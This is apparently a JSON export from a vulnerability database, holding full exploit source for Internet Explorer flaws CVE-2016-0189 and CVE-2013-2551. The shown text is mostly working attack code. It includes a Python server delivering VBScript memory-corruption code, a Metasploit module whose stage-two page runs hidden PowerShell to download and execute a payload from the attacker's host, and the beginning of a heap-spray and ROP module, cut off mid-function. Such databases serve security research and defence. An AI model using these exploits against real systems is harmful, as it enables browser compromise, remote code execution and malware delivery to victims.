Then\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Over=True\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0End If\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0If(type1=&hB9AD) Then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Over=True\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0win9x=1\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0End If\u00a0 \r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function ReadMemo(add) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a2)\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0aa(a1)=add+4\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=1.69759663316747E-313\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ReadMemo=lenb(aa(a1))\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0</script>\"\"\")\r\n\u00a0\r\nif __name__ == '__main__':\r\n\u00a0\u00a0\u00a0\u00a0sclass = BaseHTTPServer.HTTPServer\r\n\u00a0\u00a0\u00a0\u00a0server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)\r\n\u00a0\u00a0\u00a0\u00a0print \"Http server started\", socket.gethostbyname(socket.gethostname()), 80\r\n\u00a0\u00a0\u00a0\u00a0try:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0server.serve_forever()\r\n\u00a0\u00a0\u00a0\u00a0except KeyboardInterrupt:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0pass\r\n\u00a0\u00a0\u00a0\u00a0server.server_close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89272", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:04:30", "description": "No description provided by source.", "cvss3": {}, "published": "2016-08-08T00:00:00", "type": "seebug", "title": "Internet Explorer 11 VBScript engine memory corruption vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0189"], "modified": "2016-08-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92247", "id": "SSV:92247", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\nRank = NormalRanking\r\n\r\ninclude Msf::Exploit::Remote::HttpServer\r\ninclude Msf::Exploit::EXE\r\n\r\ndef initialize(info={})\r\nsuper(update_info(info,\r\n'Name' => \"Internet Explorer 11 VBScript Engine Memory Corruption\",\r\n'Description' => %q{\r\nThis module exploits the memory corruption vulnerability (CVE-2016-0189)\r\npresent in the VBScript engine of Internet Explorer 11.\r\n},\r\n'License' => MSF_LICENSE,\r\n'Author' => [\r\n'Theori', # Original RE research and exploitation\r\n'William Webb <william_webb[at]rapid7.com>' # Metasploit module\r\n],\r\n'Platform' => 'win',\r\n'Targets' =>\r\n[\r\n[ 'Automatic', {} ],\r\n[ 'Windows 10 with IE 11', { } ]\r\n],\r\n'References' =>\r\n[\r\n[ 'CVE', '2016-0189' ],\r\n[ 'MSB', 'MS16-051' ]\r\n],\r\n'Arch' => ARCH_X86_64,\r\n'DisclosureDate' => \"May 10 2016\",\r\n'DefaultTarget' => 0))\r\nend\r\n\r\ndef setup\r\n# @stage2html = Rex::Text.rand_text_alphanum(6)\r\n@ieshell = \"#{Rex::Text.rand_text_alphanumeric(6)}\" # ieshell32.dll uri\r\n@localsrv = \"#{Rex::Text.rand_text_alphanumeric(6)}\" # ielocalserver.dll uri\r\n@pm_escape_html = \"#{Rex::Text.rand_text_alphanumeric(6)}\" # vbscipt_godmode.html\r\n@payload_uri = \"#{Rex::Text.rand_text_alphanumeric(8)}\"\r\n@payload_exe = \"#{Rex::Text.rand_text_alpha(6)}.exe\"\r\nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2016-0189\", \"ieshell32.dll\" ), \"rb\") { |f| @stage2dll = f.read }\r\nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2016-0189\", \"ielocalserver.dll\" ), \"rb\") { |f| @localserver = f.read }\r\nsuper\r\nend\r\n\r\ndef exploit_html(req_uri)\r\nsrvhost = datastore['SRVHOST']\r\nsrvport = datastore['SRVPORT']\r\n\r\ntemplate = <<-EOF\r\n<html>\r\n<head>\r\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=10\">\r\n</head>\r\n<body>\r\n\r\n<script type=\"text/vbscript\">\r\nDim downloadFiles\r\nDim cacheRegex\r\nDim cacheFiles(3)\r\n\r\nDim downloadState\r\nDim pinTime\r\n\r\nDim oFSO\r\nDim oWS\r\nDim shell\r\n\r\nfunction FindFile(path, regexFile)\r\nFindFile = \"\"\r\nFor Each f in oFSO.GetFolder(path).Files\r\nIf regexFile.Test(f.Name) Then\r\nFindFile = f.Name\r\nExit For\r\nEnd If\r\nNext\r\nend function\r\n\r\nfunction SearchCache(path, regexFile)\r\nSearchCache = \"\"\r\nFor Each fld in oFSO.GetFolder(path).SubFolders\r\n'If DateDiff(\"s\", pinTime, fld.DateLastModified) >= 0 Then\r\nfilename = FindFile(path & \"\" & fld.Name, regexFile)\r\nIf filename <> \"\" Then\r\nSearchCache = path & \"\" & fld.Name & \"\" & filename\r\nExit For\r\nEnd If\r\n'End If\r\nNext\r\nend function\r\n\r\nfunction loaddll()\r\nOn Error Resume Next\r\n\r\nSet wshSystemEnv = oWS.Environment(\"Process\")\r\ntmpDir = oFSO.GetSpecialFolder(2)\r\n\r\ntmpSysDir = tmpDir & \"System32\"\r\ntmpShellFile = tmpSysDir & \"shell32.dll\"\r\noFSO.CreateFolder(tmpSysDir)\r\noFSO.MoveFile cacheFiles(0), tmpShellFile\r\n\r\nmydllFile = tmpDir & \"\" & downloadFiles(1)\r\noFSO.MoveFile cacheFiles(1), mydllFile\r\nwshSystemEnv(\"MyDllPath\") = mydllFile\r\n\r\nIf (UBound(downloadFiles) = 2) Then\r\nstage2File = tmpDir & \"#{@pm_escape_html}.html\"\r\noFSO.MoveFile cacheFiles(2), stage2File\r\nwshSystemEnv(\"stage2file\") = stage2File\r\nEnd If\r\n\r\nsaveRoot = wshSystemEnv(\"SystemRoot\")\r\nwshSystemEnv(\"SaveSystemRoot\") = saveRoot\r\nwshSystemEnv(\"SystemRoot\") = tmpDir\r\nSet shell = CreateObject(\"Shell.Application\")\r\n\r\nIf (UBound(downloadFiles) = 2) Then\r\ncall tolocal()\r\nEnd If\r\nend function\r\n\r\nSub OnDownloadDone()\r\nIf InStr(userAgent, \"NT 5.\") > 0 Then\r\ncacheDir = oWS.ExpandEnvironmentStrings(\"%USERPROFILE%\")\r\ncacheDir = cacheDir & \"Local SettingsTemporary Internet FilesLowIE\"\r\nElse\r\ncacheDir = oWS.ExpandEnvironmentStrings(\"%LOCALAPPDATA%\")\r\ncacheDir = cacheDir & \"MicrosoftWindowsTemporary Internet FilesLowIE\"\r\nEnd If\r\n\r\nSet regexFile = new regexp\r\nregexFile.Pattern = cacheRegex(downloadState)\r\ncacheFiles(downloadState) = SearchCache(cacheDir, regexFile)\r\nIf cacheFiles(downloadState) = \"\" Then\r\nExit Sub\r\nEnd If\r\n\r\nIf downloadState = UBound(downloadFiles) Then\r\nloaddll()\r\nElse\r\ndownloadState = downloadState + 1\r\nDoDownload()\r\nEnd If\r\nEnd Sub\r\n\r\nSub DoDownload()\r\npinTime = Now\r\ncall getdll(downloadFiles(downloadState))\r\nEnd Sub\r\n\r\nSub runshell()\r\ndownloadFiles = Array(\"#{@ieshell}.dll\", \"#{@localsrv}.dll\", \"#{@pm_escape_html}.html\")\r\ncacheRegex = Array(\"^#{@ieshell}[d].dll$\", \"^#{@localsrv}[d].dll$\", \"^#{@pm_escape_html}[d].htm$\")\r\nSet oFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet oWS = CreateObject(\"WScript.Shell\")\r\ndownloadState = 0\r\nDoDownload()\r\nEnd Sub\r\n\r\n</script>\r\n\r\n<script type=\"text/vbscript\">\r\nDim bl\r\nDim plunge(32)\r\nDim y(32)\r\nprefix = \"%u4141%u4141\"\r\nd = prefix & \"%u0016%u4141%u4141%u4141%u4242%u4242\"\r\nb = String(64000, \"D\")\r\nc = d & b\r\nx = UnEscape(c)\r\n\r\nClass ArrayWrapper\r\nDim A\r\n\r\nPrivate Sub Class_Initialize\r\nReDim Preserve AA(1, 2000)\r\nA = AA\r\nEnd Sub\r\n\r\nPublic Sub Resize()\r\nReDim Preserve A(1, 1)\r\nEnd Sub\r\nEnd Class\r\n\r\nClass Spray\r\nEnd Class\r\n\r\n\r\nFunction getAddr (arg1, s)\r\nbl = Null\r\nSet bl = New ArrayWrapper\r\n\r\nFor i = 0 To 32\r\nSet plunge(i) = s\r\nNext\r\n\r\nSet bl.A(arg1, 2) = s\r\n\r\nDim addr\r\nDim i\r\nFor i = 0 To 31\r\nIf Asc(Mid(y(i), 3, 1)) = VarType(s) Then\r\naddr = strToInt(Mid(y(i), 3 + 4, 2))\r\nEnd If\r\ny(i) = Null\r\nNext\r\n\r\nIf addr = Null Then\r\ndocument.location.href = document.location.href\r\nReturn\r\nEnd If\r\n\r\ngetAddr = addr\r\nEnd Function\r\n\r\nFunction leakMem (arg1, addr)\r\nd = prefix & \"%u0008%u4141%u4141%u4141\"\r\nc = d & intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\nbl = Null\r\nSet bl = New ArrayWrapper\r\n\r\nDim o\r\no = bl.A(arg1, 2)\r\n\r\nleakMem = o\r\nEnd Function\r\n\r\nSub overwrite (arg1, addr)\r\nd = prefix & \"%u400C%u0000%u0000%u0000\"\r\nc = d & intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\nbl = Null\r\nSet bl = New ArrayWrapper\r\nbl.A(arg1, 2) = CSng(0)\r\nEnd Sub\r\n\r\nFunction exploit (arg1)\r\nDim addr\r\nDim csession\r\nDim olescript\r\nDim mem\r\n\r\nSet sp = New Spray\r\naddr = getAddr(arg1, sp)\r\nmem = leakMem(arg1, addr + 8)\r\ncsession = strToInt(Mid(mem, 3, 2))\r\nmem = leakMem(arg1, csession + 4)\r\nolescript = strToInt(Mid(mem, 1, 2))\r\noverwrite arg1, olescript + &H174\r\nrunshell()\r\n\r\nEnd Function\r\n\r\nFunction triggerBug\r\nbl.Resize()\r\n\r\nDim i\r\nFor i = 0 To 32\r\ny(i) = Mid(x, 1, 24000)\r\nNext\r\nEnd Function\r\n</script>\r\n\r\n<script type=\"text/javascript\">\r\nvar userAgent = navigator.userAgent;\r\nvar oReq;\r\nfunction getdll(downloadFile)\r\n{\r\noReq = new XMLHttpRequest();\r\noReq.open(\"GET\", \"http://#{srvhost}:#{srvport}#{req_uri}/\"+downloadFile, true);\r\noReq.onreadystatechange = handler;\r\noReq.send();\r\n}\r\nfunction handler()\r\n{\r\nif (oReq.readyState == 4 && oReq.status == 200) {\r\nOnDownloadDone();\r\n}\r\n}\r\nfunction tolocal()\r\n{\r\nlocation.href = \"http://localhost:5555/#{@pm_escape_html}.html\";\r\n}\r\nfunction strToInt(s)\r\n{\r\nreturn s.charCodeAt(0) | (s.charCodeAt(1) << 16);\r\n}\r\nfunction intToStr(x)\r\n{\r\nreturn String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);\r\n}\r\nvar o;\r\no = {\"valueOf\": function () {\r\ntriggerBug();\r\nreturn 1;\r\n}};\r\nsetTimeout(function() {exploit(o);}, 50);\r\n</script>\r\n</body>\r\n</html>\r\nEOF\r\n\r\ntemplate\r\nend\r\n\r\ndef stage2_html(req_uri)\r\n\r\ntemplate = <<-EOF\r\n<html>\r\n<head>\r\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=10\">\r\n</head>\r\n<body>\r\n<script type=\"text/vbscript\">\r\nDim aw\r\nDim plunge(32)\r\nDim y(32)\r\nprefix = \"%u4141%u4141\"\r\nd = prefix & \"%u0016%u4141%u4141%u4141%u4242%u4242\"\r\nb = String(64000, \"D\")\r\nc = d & b\r\nx = UnEscape(c)\r\n\r\nClass ArrayWrapper\r\nDim A()\r\nPrivate Sub Class_Initialize\r\nReDim Preserve A(1, 2000)\r\nEnd Sub\r\n\r\nPublic Sub Resize()\r\nReDim Preserve A(1, 1)\r\nEnd Sub\r\nEnd Class\r\n\r\nClass Dummy\r\nEnd Class\r\n\r\nFunction getAddr (arg1, s)\r\naw = Null\r\nSet aw = New ArrayWrapper\r\n\r\nFor i = 0 To 32\r\nSet plunge(i) = s\r\nNext\r\n\r\nSet aw.A(arg1, 2) = s\r\n\r\nDim addr\r\nDim i\r\nFor i = 0 To 31\r\nIf Asc(Mid(y(i), 3, 1)) = VarType(s) Then\r\naddr = strToInt(Mid(y(i), 3 + 4, 2))\r\nEnd If\r\ny(i) = Null\r\nNext\r\n\r\nIf addr = Null Then\r\ndocument.location.href = document.location.href\r\nReturn\r\nEnd If\r\n\r\ngetAddr = addr\r\nEnd Function\r\n\r\nFunction leakMem (arg1, addr)\r\nd = prefix & \"%u0008%u4141%u4141%u4141\"\r\nc = d & intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\naw = Null\r\nSet aw = New ArrayWrapper\r\n\r\nDim o\r\no = aw.A(arg1, 2)\r\n\r\nleakMem = o\r\nEnd Function\r\n\r\nSub overwrite (arg1, addr)\r\nd = prefix & \"%u400C%u0000%u0000%u0000\"\r\nc = d & intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\naw = Null\r\nSet aw = New ArrayWrapper\r\naw.A(arg1, 2) = CSng(0)\r\nEnd Sub\r\n\r\nFunction exploit (arg1)\r\nDim addr\r\nDim csession\r\nDim olescript\r\nDim mem\r\n\r\nSet dm = New Dummy\r\naddr = getAddr(arg1, dm)\r\nmem = leakMem(arg1, addr + 8)\r\ncsession = strToInt(Mid(mem, 3, 2))\r\nmem = leakMem(arg1, csession + 4)\r\nolescript = strToInt(Mid(mem, 1, 2))\r\noverwrite arg1, olescript + &H174\r\n\r\nSet shObj = CreateObject(\"Wscript.shell\")\r\nshObj.Run(\"PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d\")\r\nshObj.Run(\"%temp%#{@payload_exe}\")\r\n\r\nEnd Function\r\n\r\nFunction triggerBug\r\naw.Resize()\r\n\r\nDim i\r\nFor i = 0 To 32\r\ny(i) = Mid(x, 1, 24000)\r\nNext\r\nEnd Function\r\n</script>\r\n\r\n<script type=\"text/javascript\">\r\nfunction strToInt(s)\r\n{\r\nreturn s.charCodeAt(0) | (s.charCodeAt(1) << 16);\r\n}\r\nfunction intToStr(x)\r\n{\r\nreturn String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);\r\n}\r\nvar o;\r\no = {\"valueOf\": function () {\r\ntriggerBug();\r\nreturn 1;\r\n}};\r\nsetTimeout(function() {exploit(o);}, 50);\r\n</script>\r\n</body>\r\n</html>\r\n\r\nEOF\r\ntemplate\r\nend\r\n\r\ndef on_request_uri(cli, request)\r\n# used for some debugging stuff\r\nies = @ieshell\r\nls = @localsrv\r\npm = @pm_escape_html\r\n\r\nprint_status(\"Received request: #{request.uri}\")\r\nif request.uri =~ /.*#{ies}.*$/\r\nprint_status(\"Sending stage two DLL ...\")\r\nsend_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\nelsif request.uri =~ /.*#{ls}.*$/\r\nprint_status(\"Sending local server DLL ...\")\r\nsend_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\nelsif request.uri =~ /.*#{pm}.*$/\r\nrq = \"#{get_resource.chomp('/')}\"\r\ngm = stage2_html(rq)\r\nsend_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\nelsif request.uri =~ /.*#{@payload_uri}$/\r\nreturn if ((payload = regenerate_payload(cli)) == nil)\r\nprint_status(\"Sending payload ...\")\r\nsend_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })\r\nelse\r\nprint_status(\"Sending main page ..\")\r\nsend_response(cli, exploit_html(request.uri))\r\nend\r\nend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92247", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:24", "description": "", "cvss3": {}, "published": "2013-06-13T00:00:00", "type": "packetstorm", "title": "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-13T00:00:00", "id": "PACKETSTORM:121997", "href": "https://packetstormsecurity.com/files/121997/MS13-009-Microsoft-Internet-Explorer-COALineDashStyleArray-Integer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => Rank \n}) \n \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow\", \n'Description' => %q{ \nThis module exploits an integer overflow vulnerability on Internet Explorer. \nThe vulnerability exists in the handling of the dashstyle.array length for vml \nshapes on the vgx.dll module. This module has been tested successfully on Windows 7 \nSP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target \nto use an info leak to disclose the ntdll.dll base address is provided. This target \nrequires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 \ninstallation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nicolas Joly', # Vulnerability discovery, PoC and analysis \n'4B5F5F4B', # PoC \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-2551' ], \n[ 'OSVDB', '91197' ], \n[ 'BID', '58570' ], \n[ 'MSB', 'MS13-037' ], \n[ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ], \n[ 'URL', 'http://binvul.com/viewthread.php?tid=311' ] \n], \n'Payload' => \n{ \n'Space' => 948, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows 7 SP1 with JRE ROP', # default \n{ \n'Rop' => :jre, \n'Offset' => '0x5f4' \n} \n], \n# requires: \n# * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation) \n# * ntdll.dll v6.1.7601.17725 (MS12-001) \n[ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak', \n{ \n'Rop' => :ntdll, \n'Offset' => '0x5f4' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 06 2013\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef exploit \n@second_stage_url = rand_text_alpha(10) \n@leak_param = rand_text_alpha(5) \nsuper \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0c0c \n# For IE 8 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_ntdll_rop \ncase @ntdll_version \nwhen \"6.1.7601.17514\" \nstack_pivot = [ \n@ntdll_base+0x0001578a, # ret # from ntdll \n@ntdll_base+0x000096c9, # pop ebx # ret # from ntdll 